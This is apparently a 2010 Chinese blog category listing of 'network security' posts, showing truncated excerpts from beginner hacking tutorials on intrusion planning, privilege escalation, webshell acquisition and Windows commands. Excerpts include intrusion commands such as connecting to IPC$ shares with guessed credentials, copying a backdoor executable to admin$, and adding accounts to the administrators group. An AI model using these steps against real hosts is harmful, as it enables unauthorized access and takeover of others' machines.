文章分类 -  网络安全文章

网络安全文章
入侵思路<新手学习内容>
摘要:1.入侵主机的思路 第一.先找定目标<网站或IP> 没有目标怎样入侵? 第二.找到目标是什么操作系统! 操作系统都不知道找漏洞,又怎样成入侵成功! 第三,找操作系统漏洞!如开放的端口,开放的服务等!!! 没找到漏洞怎样入侵? 第四.扫描端口!找有没有漏洞利用的端口! 端口就是入侵的通道! 第五.找到漏洞后去网上找工具或相关的漏洞利用的文章! 2.入侵网站的思路 动网的入侵 第一.找没... 阅读全文
posted @ 2010-03-17 08:38 账号难注册 阅读(229) 评论(0) 推荐(0) 编辑
21种提升权限的方法---来源中国黑客联盟
摘要:1.radmin连接法 条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来没成功过,端口到是给对方打开了。 2.paanywhere C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF文件,在本地安装pcanywhere上去。... 阅读全文
posted @ 2010-03-17 08:37 账号难注册 阅读(485) 评论(0) 推荐(0) 编辑
DOS入侵示例
摘要:1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名"   一般用流光,通过扫描弱口令来得到,管理员帐号和密码.   2. C:\>copy srv.exe \\127.0.0.1\admin$   先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$... 阅读全文
posted @ 2010-03-17 08:37 账号难注册 阅读(376) 评论(0) 推荐(0) 编辑
从后台得到webshell十大技巧大汇总
摘要:动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell的方法进行了... 阅读全文
posted @ 2010-03-17 08:36 账号难注册 阅读(410) 评论(0) 推荐(0) 编辑
入侵常用的命令和快捷键
摘要:net user 用户名 密码 /add 增加用户net user 用户名 密码 更改用户密码net localgroup administrators 用户名 /add 添加用户到管理组net user 用户名 /delete 删除用户net user 用户名 查看用户的基本情况net user 用户名 /active:no 禁用用户net user 用户名 /active:yes 启用用户ne... 阅读全文
posted @ 2010-03-17 08:35 账号难注册 阅读(232) 评论(0) 推荐(0) 编辑
转PHP 4/5多个漏洞
摘要:剑心[B.C.T] 翻译 http://www.bnso.net/B.C.T小组注:因为文章的翻译比较困难,未免会出现一些的遗漏和错误,希望大家不要见怪,请大家见凉,如果有错误的请指出 信息来源:http://marc.theaimsgroup.com/?l=bugtraq&m=110314318531298&w=2发布日期:2004-12-15最后修改:2004/12/15作者:... 阅读全文
posted @ 2010-03-17 08:34 账号难注册 阅读(214) 评论(0) 推荐(0) 编辑
关于端口
摘要:端口 21端口:21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务。   端口说明:21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务,FTP服务主要是为了在两台计算机之间实现文件的上传与下载,一台计算机作为FTP客户端,另一台计算机作为FTP服务器,可以采用匿名(anonymous)登录和授权用户名与密码登录两种方式登录... 阅读全文
posted @ 2010-03-17 08:33 账号难注册 阅读(211) 评论(0) 推荐(0) 编辑
WMIC命令大全
摘要:WMIC命令大全/NAMESPACE 别名使用的名称空间路径。 /ROLE 包含此别名定义的角色路径。 /NODE 别名使用的服务器。 /IMPLEVEL 客户模拟级别。 /AUTHLEVEL 客户身份验证级别。 /LOCALE 客户应用的语言识别符。 /PRIVILEGES 启用或禁用所有特权。 /TRACE 将调试信息输出到 stderr。 /RECORD 将所有输入命令和输出写入日志。 /I... 阅读全文
posted @ 2010-03-17 08:29 账号难注册 阅读(320) 评论(0) 推荐(0) 编辑